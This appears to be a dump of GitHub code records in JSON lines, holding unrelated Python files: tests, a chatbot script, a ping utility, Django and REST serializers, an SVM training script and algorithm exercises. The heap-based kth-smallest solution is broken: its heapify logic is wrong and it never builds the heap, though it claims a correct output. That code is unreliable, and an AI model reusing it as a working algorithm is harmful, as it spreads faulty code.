manager.write_to_completion_cache = mock.Mock(return_value=None)\n\n info_ = {}\n robj = base.Resource(manager, info_)\n self.assertEqual(0, manager.write_to_completion_cache.call_count)\n\n info_ = {\"id\": \"id-with-less-than-36-char\"}\n robj = base.Resource(manager, info_)\n self.assertEqual(info_[\"id\"], robj.id)\n self.assertEqual(0, manager.write_to_completion_cache.call_count)\n\n id_ = \"id-with-36-char-\"\n for i in range(36 - len(id_)):\n id_ = id_ + \"-\"\n info_ = {\"id\": id_}\n robj = base.Resource(manager, info_)\n self.assertEqual(info_[\"id\"], robj.id)\n self.assertEqual(1, manager.write_to_completion_cache.call_count)\n\n info_[\"name\"] = \"test-human-id\"\n # Resource.HUMAN_ID is False\n robj = base.Resource(manager, info_)\n self.assertEqual(info_[\"id\"], robj.id)\n self.assertIsNone(robj.human_id)\n self.assertEqual(2, manager.write_to_completion_cache.call_count)\n\n # base.Resource.HUMAN_ID = True\n info_[\"HUMAN_ID\"] = True\n robj = base.Resource(manager, info_)\n self.assertEqual(info_[\"id\"], robj.id)\n self.assertEqual(info_[\"name\"], robj.human_id)\n self.assertEqual(4, manager.write_to_completion_cache.call_count)\n\n def test_human_id(self):\n manager = mock.Mock()\n manager.write_to_completion_cache = mock.Mock(return_value=None)\n\n info_ = {\"name\": \"test-human-id\"}\n robj = base.Resource(manager, info_)\n self.assertIsNone(robj.human_id)\n\n info_[\"HUMAN_ID\"] = True\n robj = base.Resource(manager, info_)\n self.assertEqual(info_[\"name\"], robj.human_id)\n robj.name = \"new-human-id\"\n self.assertEqual(\"new-human-id\", robj.human_id)\n\n def get_mock_resource_obj(self):\n base.Resource.__init__ = mock.Mock(return_value=None)\n robj = base.Resource()\n robj._loaded = False\n return robj\n\n def test__add_details(self):\n robj = self.get_mock_resource_obj()\n info_ = {\"name\": \"test-human-id\", \"test_attr\": 5}\n robj._add_details(info_)\n self.assertEqual(info_[\"name\"], robj.name)\n self.assertEqual(info_[\"test_attr\"], robj.test_attr)\n\n def test___getattr__(self):\n robj = self.get_mock_resource_obj()\n info_ = {\"name\": \"test-human-id\", \"test_attr\": 5}\n robj._add_details(info_)\n self.assertEqual(info_[\"test_attr\"], robj.__getattr__(\"test_attr\"))\n\n # TODO(dmakogon): looks like causing infinite recursive calls\n # robj.__getattr__(\"test_non_exist_attr\")\n\n def test___repr__(self):\n robj = self.get_mock_resource_obj()\n info_ = {\"name\": \"test-human-id\", \"test_attr\": 5}\n robj._add_details(info_)\n\n expected = \"\"\n self.assertEqual(expected, robj.__repr__())\n\n def test_get(self):\n robj = self.get_mock_resource_obj()\n manager = mock.Mock()\n manager.get = None\n\n robj.manager = object()\n robj._get()\n\n manager = mock.Mock()\n robj.manager = mock.Mock()\n\n robj.id = \"id\"\n new = mock.Mock()\n new._info = {\"name\": \"test-human-id\", \"test_attr\": 5}\n robj.manager.get = mock.Mock(return_value=new)\n robj._get()\n self.assertEqual(\"test-human-id\", robj.name)\n self.assertEqual(5, robj.test_attr)\n\n def test___eq__(self):\n robj = self.get_mock_resource_obj()\n other = base.Resource()\n\n info_ = {\"name\": \"test-human-id\", \"test_attr\": 5}\n robj._info = info_\n other._info = {}\n self.assertFalse(robj.__eq__(other))\n\n robj.id = \"rid\"\n other.id = \"oid\"\n self.assertFalse(robj.__eq__(other))\n\n other.id = \"rid\"\n self.assertTrue(robj.__eq__(other))\n\n # not instance of the same class\n other = mock.Mock()\n self.assertEqual(robj.__eq__(other), NotImplemented)\n\n def test_is_loaded(self):\n robj = self.get_mock_resource_obj()\n robj._loaded = True\n self.assertTrue(robj.is_loaded)\n\n robj._loaded = False\n self.assertFalse(robj.is_loaded)\n","repo_name":"openstack/python-troveclient","sub_path":"troveclient/tests/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":16696,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"38"}
+{"seq_id":"32918461565","text":"#!/usr/bin/env python3\r\n\r\nimport argparse\r\nimport json\r\n\r\nfrom changes import MixtapeChanges\r\nfrom mixtapes import NaiveMixtape, OptimizedMixtape\r\n\r\n\r\ndef get_args():\r\n parser = argparse.ArgumentParser('Apply some changes')\r\n parser.add_argument('-i', '--input', dest='input_file', required=True, help='Input filename')\r\n parser.add_argument('-o', '--changes', dest='changes_file', required=True, help='Changes filename')\r\n return parser.parse_args()\r\n\r\n\r\ndef load_files(arguments):\r\n in_file = json.load(open(arguments.input_file))\r\n change_file = json.load(open(arguments.changes_file))\r\n return in_file, change_file\r\n\r\n\r\nif __name__ == '__main__':\r\n args = get_args()\r\n input_file, changes_file = load_files(args)\r\n\r\n mixtape = NaiveMixtape(input_file)\r\n mixtape_changes = MixtapeChanges(changes_file)\r\n\r\n mixtape.apply(mixtape_changes)\r\n output = json.dumps(mixtape.mixtape, indent=4)\r\n print(output)\r\n","repo_name":"KenAdamson/highspot-test","sub_path":"apply.py","file_name":"apply.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"30737934273","text":"\"\"\"\nKth smallest element in a row-wise and column-wise sorted 2D array\n\nGiven an n*n matrix where every row and column is sorted in non-decreasing order. \nFind the kth smallest element in the given 2D array.\n\nExample, \n\nInput:k = 3 and array =\n 10, 20, 30, 40\n 15, 25, 35, 45\n 24, 29, 37, 48\n 32, 33, 39, 50 \nOutput: 20\nExplanation: The 3rd smallest element is 20 \n\nInput:k = 7 and array =\n 10, 20, 30, 40\n 15, 25, 35, 45\n 24, 29, 37, 48\n 32, 33, 39, 50 \nOutput: 30\n\nApproach:\n\nThe idea is to find the kth minimum element. Each row and each column is sorted. So it can be\nthough as C sorted lists and the lists have to be merged into a single list, the kth\nelement of the list has to be found out. So the approach is similar, the only difference is\nthe kth element is found the loop ends.\n\nAlgorithm:\n1. Use min heap - create min-heap to store the elements\n2. Traverse the first row from start to end and build a min heap of elements from first row.\nA heap entry also stores row number and column number\n3. Now run a loop k times to extract min element from heap in each iteration\n4. Get minimum element or root from Min-Heap.\n5. Find row number and column number of the minimum element.\n6. Replace root with next element from same column and min-heapify the root.\n7. print the last extracted element, which is the kth minimum element.\n\n\nTime Complexity: \n\nThe solution involves following steps. \nBuilding a min-heap which takes O(n) time\nHeapify k times which takes O(k Logn) time.\n\nSpace Complexity: \nO(R), where R is the length of a row, as the Min-Heap stores one row at a time.\nThis code can be optimized to build a heap of size k when k is smaller than n. \nIn that case, the kth smallest element must be in first k rows and k columns. \n\nThis code can be optimized to build a heap of size k when k is smaller than n. In that case,\nthe kth smallest element must be in first k rows and k columns.\n\n\"\"\"\n\n# program fro kth largest element in a 2d array sorted row-wise and column-wise\nfrom sys import maxsize\n\n# A structure to store an entry of heap. The entry contains a value from 2D array, row and\n# column numbers of the value\n\nclass HeapNode:\n def __init__(self, val, r, c):\n self.val =val # value to be stored\n self.r = r # Row number of value in 2D array\n self.c = c # Column number of value in 2D array\n\n# A utility function to minheapify the node harr[i] of a heap stored in harr[]\ndef minHeapify(harr, i, heap_size):\n l = i * 2 + 1\n r = i * 2 + 2\n smallest = i\n \n if l < heap_size and harr[l].val < harr[i].val:\n smallest = l\n\n if r < heap_size and harr[r].val == 0:\n minHeapify(harr, i, heap_size)\n # minHeapify(harr, i, n)\n i -= 1\n\n# This function returns kth smallest element in a 2D array mat[][]\ndef kthSmallest(mat, n, k):\n \n # k must be greater than 0 and smaller than n*n\n if k > 0 and n*n < k:\n return maxsize\n \n # create a min heap of elements from first row of 2D array\n harr = [0] * n\n \n for i in range(n):\n harr[i] = HeapNode(mat[0][i], 0, i)\n \n # buildHeap(harr, n)\n\n hr = HeapNode(0, 0, 0)\n\n for i in range(k):\n \n # Get current heap root\n hr =harr[0]\n\n # Get next value from column of root's value. If the value stored at root was last \n # value in its column, then assign INFINITE as next value\n \n if(hr.r < n - 1):\n nextval = mat[hr.r + 1][hr.c]\n\n else:\n maxsize\n\n # update heap root with next value\n harr[0] = HeapNode(nextval, hr.r + 1, hr.c)\n\n # heapify root\n minHeapify(harr, 0, n)\n\n # Return the value at last extracted root\n return hr.val\n \nif __name__==\"__main__\":\n mat = [[10, 20, 30, 40],\n [15, 25, 35, 45],\n [25, 29, 37, 48],\n [32, 33, 39, 50]]\n print(\"7th smallest element is\", kthSmallest(mat, 4, 7))\n\n\n# expected output: 7th smallest element is 30\n\n\n\"\"\"\nBinary Search over the Range:\n\nThis approach uses binary search to iterate over possible solutions. We know that\n1. answer >= mat[0][0]\n2. answer <= mat[N-1][N-1]\n\nSo, we do a binary search on this range and in each iteration determine the no of elements\ngreater than or equal to our current middle element. The elements greater than or equal to \ncurrent element can be found in O(log(n)) time using binary search.\n\"\"\"\n# This returns count of elements in matrix less than or equal to num\ndef getElementsGreaterThanOrEqual(num, n, mat):\n ans = 0\n for i in range(n):\n # if num is less than the first element then no more element in matrix further are \n # less than or equal to num\n if(mat[i][0] > num):\n return ans\n # if num is greater than last element, it is greater than all elements in that row\n if(mat[i][n-1] <= num):\n ans += n\n continue\n # This contain the col inde of last element in matrix less than or equal to num\n greaterThan = 0\n jump = n // 2\n while(jump >= 1):\n while(greaterThan + jump < n and mat[i][greaterThan + jump] <= num):\n greaterThan += jump\n jump //=2\n\n ans += greaterThan +1\n return ans\n\n# returns kth smallest index in the matrix\ndef kthSmallest(mat, n, k):\n # We know the answer lies between the first and the last element, so, do a binary search\n # on answer based on the number of elements our current elements is greater than \n # the elements in the matrix\n l, r =mat[0][0], mat[n-1][n-1]\n\n while(l <= r):\n mid = l + (r -l) // 2\n greaterThanOrEqualMid = getElementsGreaterThanOrEqual(mid, n, mat)\n if(greaterThanOrEqualMid >= k):\n r = mid -1\n else:\n l = mid +1\n return l\n\n\nn = 4\nmat = [[10, 20, 30, 40],[15, 25, 35, 45],[25, 29, 37, 48],[32, 33, 39, 50]]\nprint(f\"7th smallest element is {kthSmallest(mat, 4, 7)}\")\n\n\"\"\"\nComplexity Analysis\n\nTime Complexity : O( y * n*logn)\nWhere y = log( abs(Mat[0][0] - Mat[n-1][n-1]) )\nWe call the getElementsGreaterThanOrEqual function log ( abs(Mat[0][0] – Mat[n-1][n-1]) ) times\nTime complexity of getElementsGreaterThanOrEqual is O(n logn) since there we do binary search n \ntimes.\n\nSpace Complexity: O(1)\n\nUSING ARRAY:\n------------\nWe will make a new array and will copy all the contents of matrix in this array.After that we will\nsort that array and find kth smallest element.This will be so easier.\n\n\n\"\"\"\n\ndef kth_smallest_arr(mat, n, k):\n\n a =[0 for i in range(n*n)]\n v = 0\n\n for i in range(n):\n for j in range(n):\n a[v] = mat[i][j]\n v +=1\n \n a.sort()\n result =a[k -1]\n return result\n\nmat = [ [ 10, 20, 30, 40 ],\n [ 15, 25, 35, 45 ],\n [ 25, 29, 37, 48 ],\n [ 32, 33, 39, 50 ] \n ]\n\nres = kthSmallest(mat, 4, 7)\n \nprint(\"7th smallest element is \"+ str(res))","repo_name":"Chemokoren/Algorithms-1","sub_path":"GFG/Arrays/OrderStatistics/kth_smallest_element_in_row_wise_and_column_wise_sorted_2D_array_set.py","file_name":"kth_smallest_element_in_row_wise_and_column_wise_sorted_2D_array_set.py","file_ext":"py","file_size_in_byte":6946,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"14098637839","text":"import xml.etree.ElementTree as ET\nimport csv\ntree = ET.parse(r\"d:\\My project\\BlogApp\\BlogApp\\fedility_service\\sample.xml\")\nprint(\"----------------------------\")\nroot = tree.getroot()\nprint(\"...................\",root)\n \nResident_data = open(r'd:\\My project\\BlogApp\\BlogApp\\fedility_service\\output.csv', 'w')\n \ncsvwriter = csv.writer(Resident_data)\nresident_head = []\ncount = 0\nfor member in root.find('ReportData'):\n print(member)\n csvwriter.writerow([member.text, \"empty\"])\n \nResident_data.close()\n\n\n\n","repo_name":"Chinjumerinamonachan/BlogApp","sub_path":"fedility_service/xml_csv_conversion.py","file_name":"xml_csv_conversion.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"36707159851","text":"import openai\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nopenai.api_key = os.getenv('OPENAI_API_KEY')\n\n\ndef get_bot_response(message):\n response = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=message,\n temperature=0.5,\n max_tokens=60,\n top_p=1.0,\n frequency_penalty=0.5,\n presence_penalty=0.0,\n stop=[\"You:\"]\n )\n # return the text of the completion\n return response.choices[0].text.strip()\n\n\ndef chat_loop():\n print(\"Hal: Hello! How can I assist you today?\")\n\n while True:\n user_message = input(\"You: \")\n if user_message.lower() in [\"quit\", \"bye\", \"goodbye\", \"see you\"]:\n print(\"Hal: Goodbye!\")\n break\n else:\n bot_response = get_bot_response(user_message)\n print(f\"Hal: {bot_response}\")\n\n\nif __name__ == \"__main__\":\n chat_loop()\n","repo_name":"kamephis/deeptalk","sub_path":"deeptalk.py","file_name":"deeptalk.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"44781278338","text":"import socket\nimport struct\nimport argparse\nimport time\nimport threading\n\nICMP_ECHO_REQUEST = 8\n\ndef calculate_checksum(packet):\n checksum = 0\n for i in range(0, len(packet), 2):\n checksum += (packet[i] << 8) + packet[i + 1]\n checksum = (checksum >> 16) + (checksum & 0xFFFF)\n return ~checksum & 0xFFFF\n\ndef send_ping_request(dest_ip):\n icmp_checksum = 0\n icmp_id = 1 \n icmp_seq = 1\n\n icmp_header = struct.pack(\"bbHHh\", ICMP_ECHO_REQUEST, 0, icmp_checksum, icmp_id, icmp_seq)\n data = b\"abcdefghijklmnopqrstuvwabcdefghi\"\n\n\n icmp_checksum = calculate_checksum(icmp_header + data)\n icmp_header = struct.pack(\"bbHHh\", ICMP_ECHO_REQUEST, 0, socket.htons(icmp_checksum), icmp_id, icmp_seq)\n\n try:\n \n raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)\n raw_socket.sendto(icmp_header + data, (dest_ip, 0))\n \n # ICMP yanıtını al\n recv_packet, addr = raw_socket.recvfrom(1024)\n round_trip_time = (time.time() - start_time) * 1000\n return round_trip_time, addr[0]\n except socket.timeout:\n return None, None\n\ndef ping_host(host, timeout):\n global start_time\n start_time = time.time()\n try:\n dest_ip = socket.gethostbyname(host)\n while not stop_event.is_set():\n response_time, dns_ip = send_ping_request(dest_ip)\n if response_time is not None:\n if dns_ip:\n print(f\"{host} ({dns_ip}) Ping successfully sent to the address. Ping time: {response_time} ms\")\n else:\n print(f\"{host} Ping successfully sent to the address. Ping time: {response_time} ms\")\n else:\n print(f\"{host} An error occurred while pinging the address.\")\n time.sleep(1)\n except Exception as e:\n print(f\"{host} An error occurred while pinging the address: {str(e)}\")\n\ndef ping_hosts_from_file(file_path, timeout):\n try:\n with open(file_path, \"r\") as file:\n targets = file.read().splitlines()\n except FileNotFoundError:\n print(f\"{file_path} File not found.\")\n return\n except Exception as e:\n print(f\"An error occurred while opening the file: {str(e)}\")\n return\n\n for target in targets:\n ping_thread = threading.Thread(target=ping_host, args=(target, timeout))\n ping_thread.start()\n\ndef main():\n global stop_event\n stop_event = threading.Event()\n\n parser = argparse.ArgumentParser(description=\"Tool used for ICMP ping to IP addresses.\")\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\"-u\", \"--url\", help=\"Pings an IP or domain address\", type=str)\n group.add_argument(\"-l\", \"--list\", help=\"Pings IP or domain addresses from a file\", type=str)\n parser.add_argument(\"-t\", \"--timeout\", help=\"Maximum timeout for ping responses (seconds)\", type=float, default=2)\n try:\n args = parser.parse_args()\n except KeyboardInterrupt:\n stop_event.set()\n return\n\n if args.url:\n ping_host(args.url, args.timeout)\n\n if args.list:\n ping_hosts_from_file(args.list, args.timeout)\n\n try:\n while not stop_event.is_set():\n pass\n except KeyboardInterrupt:\n stop_event.set()\n\nif __name__ == \"__main__\":\n main()","repo_name":"sefabasnak/MULTIPLE-PING","sub_path":"multiple-ping.py","file_name":"multiple-ping.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"72503382832","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Apr 13、4\n\n@author: xiaoheizai\n\"\"\"\n\n'''\n给定一个二维的矩阵,包含 'X' 和 'O'(字母 O)。\n\n找到所有被 'X' 围绕的区域,并将这些区域里所有的 'O' 用 'X' 填充。\n\n示例:\n\nX X X X\nX O O X\nX X O X\nX O X X\n运行你的函数后,矩阵变为:\n\nX X X X\nX X X X\nX X X X\nX O X X\n解释:\n\n被围绕的区间不会存在于边界上,换句话说,任何边界上的 'O' 都不会被填充为 'X'。 \n任何不在边界上,或不与边界上的 'O' 相连的 'O' 最终都会被填充为 'X'。\n如果两个元素在水平或垂直方向相邻,则称它们是“相连”的。\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/surrounded-regions\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n'''\n\nclass UnionFind(object):\n def __init__(self, n):\n self.uf = [-1 for i in range(n)]\n \n def find(self, node):\n temp = node\n while self.uf[node] > 0:\n node = self.uf[node]\n \n while self.uf[temp] > 0:\n self.uf[temp], temp = node, self.uf[temp]\n \n return node\n \n def union(self, node1, node2):\n root1 = self.find(node1)\n root2 = self.find(node2)\n \n if root1 == root2:\n return\n if self.uf[root1] < self.uf[root2]:\n self.uf[root1] += self.uf[root2]\n self.uf[root2] = root1\n else:\n self.uf[root2] += self.uf[root1]\n self.uf[root1] = root2\n \n def is_connect(self, node1, node2):\n return self.find(node1) == self.find(node2)\n\nclass Solution(object):\n def solve(self, board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: None Do not return anything, modify board in-place instead.\n \"\"\"\n row = len(board)\n if row == 0:\n return board\n col = len(board[0])\n union_table = UnionFind(row * col + 1)\n virtual_node = row * col\n \n for i in range(row):\n for j in range(col):\n index = i * col + j\n if i == 0 or j == 0 or i == row -1 or j == col - 1:\n if board[i][j] == \"O\":\n union_table.union(index, virtual_node)\n if board[i][j] == \"O\":\n if i < row - 1 and board[i+1][j] == \"O\":\n index_down = (i+1) * col + j\n union_table.union(index, index_down)\n if j < col - 1 and board[i][j+1] == \"O\":\n index_right = index + 1\n union_table.union(index, index_right)\n \n for i in range(row):\n for j in range(col):\n index = i * col + j\n if i == 0 or j ==0 or i == row - 1 or j == col - 1:\n continue\n else:\n if not union_table.is_connect(index, virtual_node):\n board[i][j] = \"X\"","repo_name":"xiaoheizai/python_for_leetcode","sub_path":"并查集/130 被围绕的区域.py","file_name":"130 被围绕的区域.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"35589093729","text":"# This module receives and processes the bar data\n# First draft 2016/10/3\n# This draft 2016/10/6\n\n\nimport pandas as pd\nimport datetime\n\n\n# The sample data is a stock in HS300 taken randomly from Tushare \nclass DataHandler2(object):\n\n def __init__(self, path):\n self.path = path\n self.data = pd.read_csv(self.path)\n self.data.returni = []\n for i in range(1, len(self.data)):\n self.data.returni.append(\n (self.data.close[i] - self.data.close[i - 1]) / self.data.close[i - 1])\n","repo_name":"FreeA7/financial_kmeans","sub_path":"Problem2_10_03/datahandler2.py","file_name":"datahandler2.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"20771798845","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ktapp', '0010_film_directors_cache'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='MessageCountCache',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('number_of_messages', models.PositiveIntegerField(default=0)),\n ('owned_by', models.ForeignKey(related_name='owned_message_count', to=settings.AUTH_USER_MODEL)),\n ('partner', models.ForeignKey(related_name='partner_message_count', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AlterUniqueTogether(\n name='messagecountcache',\n unique_together=set([('owned_by', 'partner')]),\n ),\n migrations.AddField(\n model_name='ktuser',\n name='number_of_messages',\n field=models.PositiveIntegerField(default=0),\n preserve_default=True,\n ),\n ]\n","repo_name":"cu2/KT","sub_path":"ktapp/migrations/0011_auto_20150902_1833.py","file_name":"0011_auto_20150902_1833.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"38"}
+{"seq_id":"12647321031","text":"from hpsklearn import HyperoptEstimator, any_sparse_classifier, tfidf,liblinear_svc\nfrom sklearn.datasets import fetch_20newsgroups\nfrom sklearn import metrics\nfrom hyperopt import tpe\nimport numpy as np\nfrom sklearn.metrics import accuracy_score,classification_report\n# Download the data and split into training and test sets\n\nimport pandas as pd, numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer,HashingVectorizer\nfrom sklearn import svm\nimport logging\nimport numpy as np\nimport time\nimport os\nimport pickle # pickle模块2\nimport logging\nimport os\nimport sys\nimport json\nimport datetime\nfrom collections import defaultdict\n\ncurrentUrl = os.path.dirname(__file__)\nmost_parenturl = os.path.abspath(os.path.join(currentUrl, os.pardir))\nm_p, m_c = os.path.split(most_parenturl)\nwhile 'xunfei' not in m_c:\n m_p, m_c = os.path.split(m_p)\n\nsys.path.append(os.path.join(m_p, m_c))\nfrom class_model.load_data import load_data\nfrom sklearn.metrics import accuracy_score\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s')\n# 1281312322\ncolumn = \"word_seg\"\nproject_path=\"/data/tanggp/xun_class//aichallenge/\"\ntest_path=os.path.join(project_path,\"apptype_train.test_jieba_json\")\ntrain_path=os.path.join(project_path,\"apptype_train.train_jieba_json\")\npred_path=os.path.join(project_path,\"app_desc.jieba_json\")\nlabel_dic = {}\nlabel_num = 0\nt = time.time()\n\nimport json\n\nfrom sklearn.calibration import CalibratedClassifierCV\n\ndef get_data_set(flie):\n global label_num\n with open(flie) as f:\n lines = f.readlines()\n data_x = []\n data_y = []\n apps=[]\n for li in lines:\n li=json.loads(li)\n text=li.get(\"jieba\")\n label1=li.get(\"label\",\"no\") #label_1st\n app=li.get(\"app\")\n apps.append(app)\n if label1 not in label_dic.keys():\n label_dic[label1] = label_num\n label_num += 1\n\n label = label_dic.get(label1)\n\n data_x.append(text)\n data_y.append(label)\n assert len(data_x) == len(data_y)\n return data_x, np.array(data_y).astype(int),apps\n\n\ndef svm_train():\n # train_x, train_y,apps = get_data_set(train_path)\n # test_x, test_y,apps = get_data_set(test_path)\n # pred_x,_,apps=get_data_set(pred_path)\n train_x, train_y, test_x, test_y, pred_x, apps, label_dic = load_data()\n # with open(CHANNEL_MODEL + 'svm_label.pkl', 'wb') as f:\n # pickle.dump(label_dic, f)\n\n logging.info('train {} test{}'.format(len(train_x), len(test_x)))\n t=time.time()\n logging.info(\"===\"*8)\n\n estim = HyperoptEstimator(classifier=liblinear_svc('clf'),max_evals=10,\n preprocessing=[\n tfidf('tfidf',ngram_range=(1, 4), min_df=10, max_df=0.9, use_idf=1, smooth_idf=1, sublinear_tf=1)],\n algo=tpe.suggest, trial_timeout=1200,refit=False)\n logging.info(estim)\n estim.fit(train_x, train_y)\n best_model=estim.best_model()\n\n logging.info(best_model)\n learner=best_model['learner']\n preprocs=best_model['preprocs'][0]\n\n lin_clf = learner\n lin_clf = CalibratedClassifierCV(lin_clf)\n data_set=train_x+test_x+pred_x\n preprocs.fit_transform(data_set)\n trn_term_doc=preprocs.transform(train_x)\n lin_clf.fit(trn_term_doc, train_y)\n\n test_term_doc = preprocs.transform(test_x)\n test_preds_prob = lin_clf.predict_proba(test_term_doc)\n test_preds_=lin_clf.predict(test_term_doc)\n logging.info('accuracy_score {} top1 test\\n {}'.format(accuracy_score(test_y, test_preds_),\n classification_report(test_y,\n test_preds_)))\n test_preds=[]\n for prob in test_preds_prob:\n test_preds.append(list(prob.argsort()[-2:][::-1]))\n\n test_preds_ = []\n for rea, tes in zip(test_y, test_preds):\n prd = tes[0]\n for te in tes:\n if rea == te:\n prd = te\n test_preds_.append(prd)\n logging.info('accuracy_score {} top2 test\\n {}'.format(accuracy_score(test_y, test_preds_),\n classification_report(test_y,\n test_preds_)))\n\n\n #logging.info(estim.fit().score(test_x, test_y))\n # <>\n #logging.info(estim.best_model())\n # <>\n\n\n\ndef svm_pred():\n logging.info('pred')\n test_x, test_y = get_data_set(pred_path)\n with open(project_path + 'tfidf.pkl', 'rb') as f:\n vec = pickle.load(f)\n\n test_term_doc = vec.transform(test_x)\n\n with open(project_path + 'svm_model.pkl', 'rb') as f:\n lin_clf = pickle.load(f)\n\n test_preds = lin_clf.predict(test_term_doc)\n\n from sklearn.metrics import confusion_matrix, classification_report\n\n logging.info('\\n {}'.format(classification_report(test_y, test_preds)))\n\nif __name__ == \"__main__\":\n svm_train()\n #svm_pred()\n\n","repo_name":"godkillok/xunfei","sub_path":"class_model/hyper.py","file_name":"hyper.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"20162960457","text":"from rest_framework import serializers\n\nfrom loads.models import Load, LoadTruck, Location, Truck\n\n\nclass TruckSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for update Truck.\"\"\"\n location = serializers.SlugRelatedField(\n queryset=Location.objects.all(),\n slug_field='zip',\n )\n\n class Meta:\n model = Truck\n fields = ('id', 'uid', 'location', 'capacity')\n read_only_fields = ('uid', 'capacity')\n\n\nclass LoadUpdateSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for update Load.\"\"\"\n pick_up = serializers.SlugRelatedField(\n read_only=True,\n slug_field='zip',\n )\n delivery = serializers.SlugRelatedField(\n read_only=True,\n slug_field='zip',\n )\n\n class Meta:\n model = Load\n fields = ('id', 'pick_up', 'delivery', 'weight', 'description')\n\n\nclass LoadBaseSerializer(serializers.ModelSerializer):\n \"\"\"Base serializer for load.\"\"\"\n pick_up = serializers.SlugRelatedField(\n queryset=Location.objects.all(),\n slug_field='zip',\n )\n delivery = serializers.SlugRelatedField(\n queryset=Location.objects.all(),\n slug_field='zip',\n )\n\n\nclass LoadCreateSerializer(LoadBaseSerializer):\n \"\"\"Serializer for create Load.\"\"\"\n class Meta:\n model = Load\n fields = ('id', 'pick_up', 'delivery', 'weight', 'description')\n\n\nclass LoadListSerializer(LoadBaseSerializer):\n \"\"\"Serializer for list view of Load.\"\"\"\n near_trucks = serializers.IntegerField()\n\n class Meta:\n model = Load\n fields = ('id', 'pick_up', 'delivery', 'near_trucks')\n\n\nclass TruckDistanceSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for truck - distance.\"\"\"\n truck = serializers.SlugRelatedField(\n slug_field='uid',\n read_only=True\n )\n\n class Meta:\n fields = ('truck', 'distance')\n model = LoadTruck\n\n\nclass LoadRetrieveSerializer(LoadBaseSerializer):\n \"\"\"Serializer for retrieve Load.\"\"\"\n trucks = TruckDistanceSerializer(many=True)\n\n class Meta:\n model = Load\n fields = (\n 'id', 'pick_up', 'delivery', 'weight', 'description', 'trucks'\n )\n","repo_name":"KuzenkovAG/truck_service","sub_path":"truck_service/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"22482281238","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# =============================================================================\n# Imports & Function definitions\n# =============================================================================\nfrom dotter.models import DotterModel\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# =============================================================================\n# Parameters\n# =============================================================================\n\ndef test_vegetation():\n \"\"\"\n testcase with vegetation growth\n \"\"\"\n deltabeek = DotterModel('tests/testcases/vegetation/config.ini')\n deltabeek.run()\n\ndef test_backwater():\n \"\"\"\n Tests whether the numerical approximation tends to the equilibrium\n \"\"\"\n deltabeek = DotterModel('tests/testcases/backwater/config.ini')\n\n # The accuracy of the numerical resolution depends on the h_resolution\n deltabeek.grid.h_resolution = 50\n deltabeek.grid.max_depth = 5\n deltabeek.grid.generate_grid()\n\n # Equilibrium depth\n depth = 1.568138\n\n # Check whether above depth is equilibrium\n h = deltabeek.grid.bedlevel[0] + depth\n A = deltabeek.grid.wet_area[0](h)\n R = deltabeek.grid.hydraulic_radius[0](h)\n i = deltabeek.grid.bedslope[0]\n C = R ** (1 / 6.) / 0.04\n\n assert(np.abs(3.50 - A * C * np.sqrt(R * i)) < 0.001)\n\n deltabeek.run(timesteps=[deltabeek.grid.time[0]])\n error = np.abs(deltabeek.output.waterdepth[0][0] - depth)\n assert (error < 0.001)\n","repo_name":"kdberends/dotter","sub_path":"tests/test_hydraulics.py","file_name":"test_hydraulics.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
